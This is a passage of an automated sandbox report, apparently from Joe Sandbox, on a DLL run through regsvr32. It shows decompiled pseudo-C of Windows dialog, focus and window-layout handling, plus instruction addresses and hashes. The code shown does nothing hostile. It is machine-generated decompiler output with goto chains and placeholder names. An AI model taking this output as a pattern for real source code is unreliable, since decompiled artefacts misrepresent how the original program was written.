                                                                                                                						L14:
                                                                                                                						if(_t238 == 0) {
                                                                                                                							L21:
                                                                                                                							__eflags =  *(_t238 + 4);
                                                                                                                							if(__eflags == 0) {
                                                                                                                								E1000A069(0, _t232, _t238, _t247, __eflags);
                                                                                                                								asm("int3");
                                                                                                                								_push(0x28);
                                                                                                                								E10047680(0x1009095f, 0, _t238, _t247);
                                                                                                                								_t146 = _a4;
                                                                                                                								__eflags = _t146;
                                                                                                                								if(_t146 != 0) {
                                                                                                                									_v48 =  *((intOrPtr*)(_t146 + 0x20));
                                                                                                                								} else {
                                                                                                                									_v48 = _v48 & _t146;
                                                                                                                								}
                                                                                                                								_t240 = _a8;
                                                                                                                								_t249 = _t240->message;
                                                                                                                								_v32 = _t249;
                                                                                                                								_v52 = GetFocus();
                                                                                                                								_t149 = E10013FEA(0, _t232, _t260, _t148);
                                                                                                                								_t229 = 0x100;
                                                                                                                								__eflags = _t249 - 0x100;
                                                                                                                								_v24 = _t149;
                                                                                                                								if(_t249 < 0x100) {
                                                                                                                									L34:
                                                                                                                									__eflags = _t249 + 0xfffffe00 - 9;
                                                                                                                									if(_t249 + 0xfffffe00 > 9) {
                                                                                                                										goto L56;
                                                                                                                									} else {
                                                                                                                										goto L35;
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									__eflags = _t249 - 0x109;
                                                                                                                									if(_t249 <= 0x109) {
                                                                                                                										L35:
                                                                                                                										__eflags = _t149;
                                                                                                                										if(_t149 == 0) {
                                                                                                                											L56:
                                                                                                                											_t251 = 0;
                                                                                                                											_v28 = 0;
                                                                                                                											_t150 = E10013FEA(_t229, _t232, _t260,  *_t240);
                                                                                                                											_v44 = _v44 & 0;
                                                                                                                											_v36 = _t150;
                                                                                                                											_t152 = _v32 - _t229;
                                                                                                                											__eflags = _t152;
                                                                                                                											_v40 = 2;
                                                                                                                											if(_t152 == 0) {
                                                                                                                												_t153 = E10032AFB(_v36, _t240);
                                                                                                                												_t232 =  *(_t240 + 8) & 0x0000ffff;
                                                                                                                												__eflags = _t232 - 0x1b;
                                                                                                                												if(__eflags > 0) {
                                                                                                                													__eflags = _t232 - 0x25;
                                                                                                                													if(_t232 < 0x25) {
                                                                                                                														goto L75;
                                                                                                                													} else {
                                                                                                                														__eflags = _t232 - 0x26;
                                                                                                                														if(_t232 <= 0x26) {
                                                                                                                															_v44 = 1;
                                                                                                                															goto L110;
                                                                                                                														} else {
                                                                                                                															__eflags = _t232 - 0x28;
                                                                                                                															if(_t232 <= 0x28) {
                                                                                                                																L110:
                                                                                                                																_t171 = E10032AFB(_v24, _t240);
                                                                                                                																__eflags = _t171 & 0x00000001;
                                                                                                                																if((_t171 & 0x00000001) != 0) {
                                                                                                                																	goto L75;
                                                                                                                																} else {
                                                                                                                																	__eflags = _v44;
                                                                                                                																	_t232 = _a4;
                                                                                                                																	_push(0);
                                                                                                                																	if(_v44 == 0) {
                                                                                                                																		_t172 = E10018415(_t229, _t232, _t240);
                                                                                                                																	} else {
                                                                                                                																		_t172 = E100183C7(_t229, _t232, _t240);
                                                                                                                																	}
                                                                                                                																	_t254 = _t172;
                                                                                                                																	__eflags = _t254;
                                                                                                                																	if(_t254 == 0) {
                                                                                                                																		goto L75;
                                                                                                                																	} else {
                                                                                                                																		__eflags =  *(_t254 + 8);
                                                                                                                																		if( *(_t254 + 8) != 0) {
                                                                                                                																			_t232 = _a4;
                                                                                                                																			E10017EC9(_a4, _t254);
                                                                                                                																		}
                                                                                                                																		__eflags =  *(_t254 + 4);
                                                                                                                																		if( *(_t254 + 4) == 0) {
                                                                                                                																			_t173 =  *_t254;
                                                                                                                																			__eflags = _t173;
                                                                                                                																			if(_t173 == 0) {
                                                                                                                																				_t232 = _a4;
                                                                                                                																				_t174 = E10032C12(_a4, _v24, _v44);
                                                                                                                																			} else {
                                                                                                                																				_t174 = E10013FEA(_t229, _t232, _t260, _t173);
                                                                                                                																			}
                                                                                                                																			_t242 = _t174;
                                                                                                                																			__eflags = _t242;
                                                                                                                																			if(_t242 == 0) {
                                                                                                                																				goto L75;
                                                                                                                																			} else {
                                                                                                                																				_t229 = 0;
                                                                                                                																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
                                                                                                                																				E10032C5C(_t242);
                                                                                                                																				__eflags =  *(_t254 + 8);
                                                                                                                																				if( *(_t254 + 8) != 0) {
                                                                                                                																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
                                                                                                                																				}
                                                                                                                																				goto L125;
                                                                                                                																			}
                                                                                                                																		} else {
                                                                                                                																			_t232 =  *(_t254 + 4);
                                                                                                                																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
                                                                                                                																			goto L125;
                                                                                                                																		}
                                                                                                                																	}
                                                                                                                																}
                                                                                                                															} else {
                                                                                                                																__eflags = _t232 - 0x2b;
                                                                                                                																if(_t232 != 0x2b) {
                                                                                                                																	goto L75;
                                                                                                                																} else {
                                                                                                                																	goto L97;
                                                                                                                																}
                                                                                                                															}
                                                                                                                														}
                                                                                                                													}
                                                                                                                													goto L126;
                                                                                                                												} else {
                                                                                                                													if(__eflags == 0) {
                                                                                                                														L103:
                                                                                                                														_t243 = 0;
                                                                                                                														__eflags = 0;
                                                                                                                														goto L104;
                                                                                                                													} else {
                                                                                                                														__eflags = _t232 - 3;
                                                                                                                														if(_t232 == 3) {
                                                                                                                															goto L103;
                                                                                                                														} else {
                                                                                                                															__eflags = _t232 - 9;
                                                                                                                															if(_t232 == 9) {
                                                                                                                																__eflags = _t153 & 0x00000002;
                                                                                                                																if((_t153 & 0x00000002) != 0) {
                                                                                                                																	goto L75;
                                                                                                                																} else {
                                                                                                                																	_t188 = GetKeyState(0x10);
                                                                                                                																	_t255 = _a4;
                                                                                                                																	__eflags = _t188;
                                                                                                                																	_t229 = 0 | _t188 < 0x00000000;
                                                                                                                																	_t232 = _t255;
                                                                                                                																	_t189 = E10017D72(_t255, 0, _t188 < 0);
                                                                                                                																	__eflags = _t189;
                                                                                                                																	if(_t189 == 0) {
                                                                                                                																		goto L75;
                                                                                                                																	} else {
                                                                                                                																		__eflags =  *(_t189 + 4);
                                                                                                                																		if( *(_t189 + 4) == 0) {
                                                                                                                																			_t190 =  *_t189;
                                                                                                                																			__eflags = _t190;
                                                                                                                																			if(_t190 == 0) {
                                                                                                                																				_t232 = _t255;
                                                                                                                																				_t191 = E1001B7D4(_t255, _v36, _t229);
                                                                                                                																			} else {
                                                                                                                																				_t191 = E10013FEA(_t229, _t232, _t260, _t190);
                                                                                                                																			}
                                                                                                                																			_t244 = _t191;
                                                                                                                																			__eflags = _t244;
                                                                                                                																			if(_t244 != 0) {
                                                                                                                																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
                                                                                                                																				E10032C5C(_t244);
                                                                                                                																				L10032E26(_t229, _t232, _t260, _v24, _t244);
                                                                                                                																				_pop(_t232);
                                                                                                                																			}
                                                                                                                																		} else {
                                                                                                                																			_t195 =  *(_t189 + 4);
                                                                                                                																			_t232 = _t195;
                                                                                                                																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
                                                                                                                																		}
                                                                                                                																		goto L125;
                                                                                                                																	}
                                                                                                                																}
                                                                                                                																goto L126;
                                                                                                                															} else {
                                                                                                                																__eflags = _t232 - 0xd;
                                                                                                                																if(_t232 == 0xd) {
                                                                                                                																	L97:
                                                                                                                																	__eflags = _t153 & 0x00000004;
                                                                                                                																	if((_t153 & 0x00000004) != 0) {
                                                                                                                																		goto L75;
                                                                                                                																	} else {
                                                                                                                																		_t182 = E10032BF1(_v24);
                                                                                                                																		__eflags = _t182 & 0x00000010;
                                                                                                                																		_pop(_t232);
                                                                                                                																		if((_t182 & 0x00000010) == 0) {
                                                                                                                																			_t183 = L10032FA7(_a4);
                                                                                                                																		} else {
                                                                                                                																			_t251 = _v24;
                                                                                                                																			_t232 = _t251;
                                                                                                                																			_t183 = E100178C1(_t251);
                                                                                                                																		}
                                                                                                                																		_t243 = 0;
                                                                                                                																		__eflags = _t251;
                                                                                                                																		_v40 = _t183;
                                                                                                                																		if(_t251 != 0) {
                                                                                                                																			L105:
                                                                                                                																			_t232 = _t251;
                                                                                                                																			_t184 = E1001795E(_t251);
                                                                                                                																			__eflags = _t184;
                                                                                                                																			if(_t184 != 0) {
                                                                                                                																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
                                                                                                                																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
                                                                                                                																					goto L75;
                                                                                                                																				} else {
                                                                                                                																					_push(_t243);
                                                                                                                																					_push(_t243);
                                                                                                                																					_push(_t243);
                                                                                                                																					_push(1);
                                                                                                                																					_push(0xfffffdd9);
                                                                                                                																					_push(_t251);
                                                                                                                																					_v8 = _t243;
                                                                                                                																					E100179BB();
                                                                                                                																					_v8 = _v8 | 0xffffffff;
                                                                                                                																					goto L125;
                                                                                                                																				}
                                                                                                                																			} else {
                                                                                                                																				MessageBeep(_t243);
                                                                                                                																				goto L75;
                                                                                                                																			}
                                                                                                                																		} else {
                                                                                                                																			L104:
                                                                                                                																			_t251 = L10032EA1(_a4, _v40);
                                                                                                                																			__eflags = _t251 - _t243;
                                                                                                                																			if(_t251 == _t243) {
                                                                                                                																				goto L75;
                                                                                                                																			} else {
                                                                                                                																				goto L105;
                                                                                                                																			}
                                                                                                                																		}
                                                                                                                																	}
                                                                                                                																	goto L126;
                                                                                                                																} else {
                                                                                                                																	goto L75;
                                                                                                                																}
                                                                                                                															}
                                                                                                                														}
                                                                                                                													}
                                                                                                                												}
                                                                                                                												goto L79;
                                                                                                                											} else {
                                                                                                                												_t198 = _t152;
                                                                                                                												__eflags = _t198;
                                                                                                                												if(_t198 == 0) {
                                                                                                                													L62:
                                                                                                                													_t199 = E10032AFB(_v36, _t240);
                                                                                                                													__eflags = _v32 - 0x102;
                                                                                                                													if(_v32 != 0x102) {
                                                                                                                														L64:
                                                                                                                														_t232 =  *(_t240 + 8) & 0x0000ffff;
                                                                                                                														__eflags = _t232 - 9;
                                                                                                                														if(_t232 != 9) {
                                                                                                                															L66:
                                                                                                                															__eflags = _t232 - 0x20;
                                                                                                                															if(__eflags == 0) {
                                                                                                                																goto L54;
                                                                                                                															} else {
                                                                                                                																_push(_t240);
                                                                                                                																_t200 = E10033257(_t229, _t232, _t240, _t251, __eflags, _a4, _v36);
                                                                                                                																__eflags = _t200;
                                                                                                                																if(_t200 == 0) {
                                                                                                                																	goto L75;
                                                                                                                																} else {
                                                                                                                																	_t201 =  *(_t200 + 4);
                                                                                                                																	__eflags = _t201;
                                                                                                                																	if(_t201 == 0) {
                                                                                                                																		goto L75;
                                                                                                                																	} else {
                                                                                                                																		_t232 = _t201;
                                                                                                                																		E1002C8CD(_t201, _t240);
                                                                                                                																		L125:
                                                                                                                																		_v28 = 1;
                                                                                                                																	}
                                                                                                                																}
                                                                                                                																goto L79;
                                                                                                                															}
                                                                                                                														} else {
                                                                                                                															__eflags = _t199 & 0x00000002;
                                                                                                                															if((_t199 & 0x00000002) != 0) {
                                                                                                                																goto L75;
                                                                                                                															} else {
                                                                                                                																goto L66;
                                                                                                                															}
                                                                                                                														}
                                                                                                                													} else {
                                                                                                                														__eflags = _t199 & 0x00000084;
                                                                                                                														if((_t199 & 0x00000084) != 0) {
                                                                                                                															goto L75;
                                                                                                                														} else {
                                                                                                                															goto L64;
                                                                                                                														}
                                                                                                                													}
                                                                                                                												} else {
                                                                                                                													__eflags = _t198 != 4;
                                                                                                                													if(_t198 != 4) {
                                                                                                                														L75:
                                                                                                                														_t154 = _a4;
                                                                                                                														__eflags =  *(_t154 + 0x3c) & 0x00001000;
                                                                                                                														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
                                                                                                                															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
                                                                                                                															__eflags = _t165;
                                                                                                                															_v28 = _t165;
                                                                                                                															if(_t165 != 0) {
                                                                                                                																_t167 = E10013FEA(_t229, _t232, _t260, GetFocus());
                                                                                                                																__eflags = _t167 - _v24;
                                                                                                                																if(_t167 != _v24) {
                                                                                                                																	L10032DB9(_t232, E10013FEA(_t229, _t232, _t260, GetFocus()));
                                                                                                                																	_pop(_t232);
                                                                                                                																}
                                                                                                                															}
                                                                                                                														}
                                                                                                                														L79:
                                                                                                                														_t155 = IsWindow(_v52);
                                                                                                                														__eflags = _t155;
                                                                                                                														if(_t155 != 0) {
                                                                                                                															L10032E26(_t229, _t232, _t260, _v24, E10013FEA(_t229, _t232, _t260, GetFocus()));
                                                                                                                															_pop(_t234);
                                                                                                                															_t161 = IsWindow(_v48);
                                                                                                                															__eflags = _t161;
                                                                                                                															if(_t161 != 0) {
                                                                                                                																L10032FD4(_a4, _v24, E10013FEA(_t229, _t234, _t260, GetFocus()));
                                                                                                                															}
                                                                                                                														}
                                                                                                                														_t156 = _v28;
                                                                                                                													} else {
                                                                                                                														__eflags = _v24;
                                                                                                                														if(_v24 != 0) {
                                                                                                                															L61:
                                                                                                                															__eflags =  *(_t240 + 8) - 0x20;
                                                                                                                															if( *(_t240 + 8) == 0x20) {
                                                                                                                																goto L75;
                                                                                                                															} else {
                                                                                                                																goto L62;
                                                                                                                															}
                                                                                                                														} else {
                                                                                                                															_t204 = GetKeyState(0x12);
                                                                                                                															__eflags = _t204;
                                                                                                                															if(_t204 >= 0) {
                                                                                                                																goto L75;
                                                                                                                															} else {
                                                                                                                																goto L61;
                                                                                                                															}
                                                                                                                														}
                                                                                                                													}
                                                                                                                												}
                                                                                                                											}
                                                                                                                										} else {
                                                                                                                											_t256 = _t149;
                                                                                                                											while(1) {
                                                                                                                												__eflags =  *(_t256 + 0x50);
                                                                                                                												if( *(_t256 + 0x50) != 0) {
                                                                                                                													break;
                                                                                                                												}
                                                                                                                												_t211 = E10013FEA(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
                                                                                                                												__eflags = _t211 - _a4;
                                                                                                                												if(_t211 != _a4) {
                                                                                                                													_t256 = E10013FEA(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
                                                                                                                													__eflags = _t256;
                                                                                                                													if(_t256 != 0) {
                                                                                                                														continue;
                                                                                                                													}
                                                                                                                												}
                                                                                                                												break;
                                                                                                                											}
                                                                                                                											__eflags = _t256;
                                                                                                                											if(_t256 == 0) {
                                                                                                                												L45:
                                                                                                                												__eflags = _v32 - 0x101;
                                                                                                                												if(_v32 == 0x101) {
                                                                                                                													L48:
                                                                                                                													__eflags = _t256;
                                                                                                                													if(_t256 == 0) {
                                                                                                                														goto L55;
                                                                                                                													} else {
                                                                                                                														_t257 =  *(_t256 + 0x50);
                                                                                                                														__eflags = _t257;
                                                                                                                														if(_t257 == 0) {
                                                                                                                															goto L55;
                                                                                                                														} else {
                                                                                                                															_t206 = _a8->wParam & 0x0000ffff;
                                                                                                                															__eflags = _t206 - 0xd;
                                                                                                                															if(_t206 != 0xd) {
                                                                                                                																L52:
                                                                                                                																__eflags = _t206 - 0x1b;
                                                                                                                																if(_t206 != 0x1b) {
                                                                                                                																	goto L55;
                                                                                                                																} else {
                                                                                                                																	__eflags =  *(_t257 + 0x84) & 0x00000002;
                                                                                                                																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
                                                                                                                																		goto L55;
                                                                                                                																	} else {
                                                                                                                																		goto L54;
                                                                                                                																	}
                                                                                                                																}
                                                                                                                															} else {
                                                                                                                																__eflags =  *(_t257 + 0x84) & 0x00000001;
                                                                                                                																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
                                                                                                                																	L54:
                                                                                                                																	_t156 = 0;
                                                                                                                																} else {
                                                                                                                																	goto L52;
                                                                                                                																}
                                                                                                                															}
                                                                                                                														}
                                                                                                                													}
                                                                                                                												} else {
                                                                                                                													__eflags = _v32 - _t229;
                                                                                                                													if(_v32 == _t229) {
                                                                                                                														goto L48;
                                                                                                                													} else {
                                                                                                                														__eflags = _v32 - 0x102;
                                                                                                                														if(_v32 != 0x102) {
                                                                                                                															L55:
                                                                                                                															_t240 = _a8;
                                                                                                                															goto L56;
                                                                                                                														} else {
                                                                                                                															goto L48;
                                                                                                                														}
                                                                                                                													}
                                                                                                                												}
                                                                                                                											} else {
                                                                                                                												_t207 =  *(_t256 + 0x50);
                                                                                                                												__eflags = _t207;
                                                                                                                												if(_t207 == 0) {
                                                                                                                													goto L45;
                                                                                                                												} else {
                                                                                                                													__eflags =  *(_t207 + 0x58);
                                                                                                                													if( *(_t207 + 0x58) == 0) {
                                                                                                                														goto L45;
                                                                                                                													} else {
                                                                                                                														_t208 =  *(_t207 + 0x58);
                                                                                                                														_t232 =  *_t208;
                                                                                                                														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
                                                                                                                														__eflags = _t209;
                                                                                                                														if(_t209 != 0) {
                                                                                                                															goto L45;
                                                                                                                														} else {
                                                                                                                															_t156 = _t209 + 1;
                                                                                                                														}
                                                                                                                													}
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										goto L34;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								return E10047725(_t156);
                                                                                                                							} else {
                                                                                                                								_t232 =  *(_t238 + 4);
                                                                                                                								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
                                                                                                                								__eflags = _t215 & 0x08000000;
                                                                                                                								if((_t215 & 0x08000000) == 0) {
                                                                                                                									goto L20;
                                                                                                                								} else {
                                                                                                                									goto L23;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_t216 =  *(_t238 + 4);
                                                                                                                							if(_t216 == 0) {
                                                                                                                								_t217 =  *_t238;
                                                                                                                							} else {
                                                                                                                								_t217 =  *(_t216 + 0x24);
                                                                                                                							}
                                                                                                                							if(_t217 == 0) {
                                                                                                                								goto L21;
                                                                                                                							} else {
                                                                                                                								if(IsWindowEnabled(_t217) == 0) {
                                                                                                                									L23:
                                                                                                                									__eflags = _t238 - _v8;
                                                                                                                									if(_t238 == _v8) {
                                                                                                                										break;
                                                                                                                									} else {
                                                                                                                										__eflags = _v8;
                                                                                                                										if(_v8 == 0) {
                                                                                                                											_v8 = _t238;
                                                                                                                										}
                                                                                                                										_t247 = _t247 + 1;
                                                                                                                										__eflags = _t247 - 0x200;
                                                                                                                										if(_t247 < 0x200) {
                                                                                                                											continue;
                                                                                                                										} else {
                                                                                                                											break;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									L20:
                                                                                                                									_t141 = _t238;
                                                                                                                									L28:
                                                                                                                									return _t141;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t232 = _a4;
                                                                                                                						_t238 = E10017D72(_a4, _t238, 0);
                                                                                                                						if(_t238 == 0) {
                                                                                                                							break;
                                                                                                                						} else {
                                                                                                                							goto L14;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					L126:
                                                                                                                				}
                                                                                                                				_t141 = 0;
                                                                                                                				__eflags = 0;
                                                                                                                				goto L28;
                                                                                                                			}
                                                                                                                0x100335c8
                                                                                                                0x100335ca
                                                                                                                0x100335d0
                                                                                                                0x100335d5
                                                                                                                0x100335d8
                                                                                                                0x100335db
                                                                                                                0x100335e0
                                                                                                                0x100335e5
                                                                                                                0x100335e7
                                                                                                                0x00000000
                                                                                                                0x100335ed
                                                                                                                0x100335ed
                                                                                                                0x100335f1
                                                                                                                0x10033606
                                                                                                                0x10033608
                                                                                                                0x1003360a
                                                                                                                0x10033618
                                                                                                                0x1003361a
                                                                                                                0x1003360c
                                                                                                                0x1003360d
                                                                                                                0x1003360d
                                                                                                                0x1003361f
                                                                                                                0x10033621
                                                                                                                0x10033623
                                                                                                                0x1003362c
                                                                                                                0x10033631
                                                                                                                0x1003363a
                                                                                                                0x10033640
                                                                                                                0x10033640
                                                                                                                0x100335f3
                                                                                                                0x100335f3
                                                                                                                0x100335f9
                                                                                                                0x100335fb
                                                                                                                0x100335fb
                                                                                                                0x00000000
                                                                                                                0x100335f1
                                                                                                                0x100335e7
                                                                                                                0x00000000
                                                                                                                0x10033527
                                                                                                                0x10033527
                                                                                                                0x1003352a
                                                                                                                0x1003366a
                                                                                                                0x1003366a
                                                                                                                0x1003366c
                                                                                                                0x00000000
                                                                                                                0x10033672
                                                                                                                0x10033675
                                                                                                                0x1003367a
                                                                                                                0x1003367c
                                                                                                                0x1003367d
                                                                                                                0x1003368e
                                                                                                                0x1003367f
                                                                                                                0x1003367f
                                                                                                                0x10033682
                                                                                                                0x10033684
                                                                                                                0x10033684
                                                                                                                0x10033693
                                                                                                                0x10033695
                                                                                                                0x10033697
                                                                                                                0x1003369a
                                                                                                                0x100336b5
                                                                                                                0x100336b5
                                                                                                                0x100336b7
                                                                                                                0x100336bc
                                                                                                                0x100336be
                                                                                                                0x100336cc
                                                                                                                0x100336cf
                                                                                                                0x00000000
                                                                                                                0x100336d5
                                                                                                                0x100336d5
                                                                                                                0x100336d6
                                                                                                                0x100336d7
                                                                                                                0x100336d8
                                                                                                                0x100336da
                                                                                                                0x100336df
                                                                                                                0x100336e0
                                                                                                                0x100336e3
                                                                                                                0x100336eb
                                                                                                                0x00000000
                                                                                                                0x100336eb
                                                                                                                0x100336c0
                                                                                                                0x100336c1
                                                                                                                0x00000000
                                                                                                                0x100336c1
                                                                                                                0x1003369c
                                                                                                                0x100336a0
                                                                                                                0x100336ab
                                                                                                                0x100336ad
                                                                                                                0x100336af
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100336af
                                                                                                                0x1003369a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003352a
                                                                                                                0x10033521
                                                                                                                0x10033518
                                                                                                                0x1003350f
                                                                                                                0x00000000
                                                                                                                0x10033479
                                                                                                                0x1003347a
                                                                                                                0x1003347a
                                                                                                                0x1003347b
                                                                                                                0x100334a7
                                                                                                                0x100334ab
                                                                                                                0x100334b0
                                                                                                                0x100334b7
                                                                                                                0x100334bd
                                                                                                                0x100334bd
                                                                                                                0x100334c1
                                                                                                                0x100334c5
                                                                                                                0x100334cb
                                                                                                                0x100334cb
                                                                                                                0x100334cf
                                                                                                                0x00000000
                                                                                                                0x100334d5
                                                                                                                0x100334d5
                                                                                                                0x100334dc
                                                                                                                0x100334e1
                                                                                                                0x100334e3
                                                                                                                0x00000000
                                                                                                                0x100334e5
                                                                                                                0x100334e5
                                                                                                                0x100334e8
                                                                                                                0x100334ea
                                                                                                                0x00000000
                                                                                                                0x100334ec
                                                                                                                0x100334ed
                                                                                                                0x100334ef
                                                                                                                0x100337ab
                                                                                                                0x100337ab
                                                                                                                0x100337ab
                                                                                                                0x100334ea
                                                                                                                0x00000000
                                                                                                                0x100334e3
                                                                                                                0x100334c7
                                                                                                                0x100334c7
                                                                                                                0x100334c9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100334c9
                                                                                                                0x100334b9
                                                                                                                0x100334b9
                                                                                                                0x100334bb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100334bb
                                                                                                                0x1003347d
                                                                                                                0x1003347d
                                                                                                                0x10033480
                                                                                                                0x10033530
                                                                                                                0x10033530
                                                                                                                0x10033533
                                                                                                                0x10033539
                                                                                                                0x10033541
                                                                                                                0x10033547
                                                                                                                0x10033549
                                                                                                                0x1003354c
                                                                                                                0x10033557
                                                                                                                0x1003355c
                                                                                                                0x1003355f
                                                                                                                0x1003356a
                                                                                                                0x1003356f
                                                                                                                0x1003356f
                                                                                                                0x1003355f
                                                                                                                0x1003354c
                                                                                                                0x10033570
                                                                                                                0x10033579
                                                                                                                0x1003357b
                                                                                                                0x1003357d
                                                                                                                0x10033591
                                                                                                                0x10033597
                                                                                                                0x1003359b
                                                                                                                0x1003359d
                                                                                                                0x1003359f
                                                                                                                0x100335b0
                                                                                                                0x100335b0
                                                                                                                0x1003359f
                                                                                                                0x100335b5
                                                                                                                0x10033486
                                                                                                                0x10033486
                                                                                                                0x10033489
                                                                                                                0x1003349c
                                                                                                                0x1003349c
                                                                                                                0x100334a1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003348b
                                                                                                                0x1003348d
                                                                                                                0x10033493
                                                                                                                0x10033496
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10033496
                                                                                                                0x10033489
                                                                                                                0x10033480
                                                                                                                0x1003347b
                                                                                                                0x100333ae
                                                                                                                0x100333b4
                                                                                                                0x100333b6
                                                                                                                0x100333b6
                                                                                                                0x100333ba
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100333c2
                                                                                                                0x100333c7
                                                                                                                0x100333ca
                                                                                                                0x100333d7
                                                                                                                0x100333d9
                                                                                                                0x100333db
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100333db
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                                • String ID:
                                                                                                                • API String ID: 656273425-0
                                                                                                                • Opcode ID: 24ff8eb11f4b22da7dd3a85a51e3518b23e58b2ea24e9437b63622b344030637
                                                                                                                • Instruction ID: d662ab5222291105f51a5311d2acb9bc16b1c6a0e98c36f1c822bc35365c2189
                                                                                                                • Opcode Fuzzy Hash: 24ff8eb11f4b22da7dd3a85a51e3518b23e58b2ea24e9437b63622b344030637
                                                                                                                • Instruction Fuzzy Hash: 0AF18075900656AFDB23DB60C8C5AAE7BF5EF44292F11C029E846AF361DB34ED81CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 89%
                                                                                                                			E100139B0(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				struct tagRECT _v28;
                                                                                                                				struct tagRECT _v44;
                                                                                                                				struct tagRECT _v60;
                                                                                                                				struct tagRECT _v80;
                                                                                                                				char _v100;
                                                                                                                				void* __edi;
                                                                                                                				intOrPtr _t58;
                                                                                                                				struct HWND__* _t59;
                                                                                                                				intOrPtr _t94;
                                                                                                                				signed int _t103;
                                                                                                                				struct HWND__* _t104;
                                                                                                                				void* _t105;
                                                                                                                				struct HWND__* _t107;
                                                                                                                				long _t108;
                                                                                                                				long _t116;
                                                                                                                				void* _t119;
                                                                                                                				struct HWND__* _t121;
                                                                                                                				void* _t123;
                                                                                                                				intOrPtr _t125;
                                                                                                                				intOrPtr _t129;
                                                                                                                
                                                                                                                				_t119 = __edx;
                                                                                                                				_t105 = __ebx;
                                                                                                                				_t125 = __ecx;
                                                                                                                				_v12 = __ecx;
                                                                                                                				_v8 = E100177F8(__ecx);
                                                                                                                				_t58 = _a4;
                                                                                                                				if(_t58 == 0) {
                                                                                                                					if((_v8 & 0x40000000) == 0) {
                                                                                                                						_t59 = GetWindow( *(__ecx + 0x20), 4);
                                                                                                                					} else {
                                                                                                                						_t59 = GetParent( *(__ecx + 0x20));
                                                                                                                					}
                                                                                                                					_t121 = _t59;
                                                                                                                					if(_t121 != 0) {
                                                                                                                						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
                                                                                                                						if(_t104 != 0) {
                                                                                                                							_t121 = _t104;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t121 =  *(_t58 + 0x20);
                                                                                                                				}
                                                                                                                				_push(_t105);
                                                                                                                				GetWindowRect( *(_t125 + 0x20),  &_v60);
                                                                                                                				if((_v8 & 0x40000000) != 0) {
                                                                                                                					_t107 = GetParent( *(_t125 + 0x20));
                                                                                                                					GetClientRect(_t107,  &_v28);
                                                                                                                					GetClientRect(_t121,  &_v44);
                                                                                                                					MapWindowPoints(_t121, _t107,  &_v44, 2);
                                                                                                                				} else {
                                                                                                                					if(_t121 != 0) {
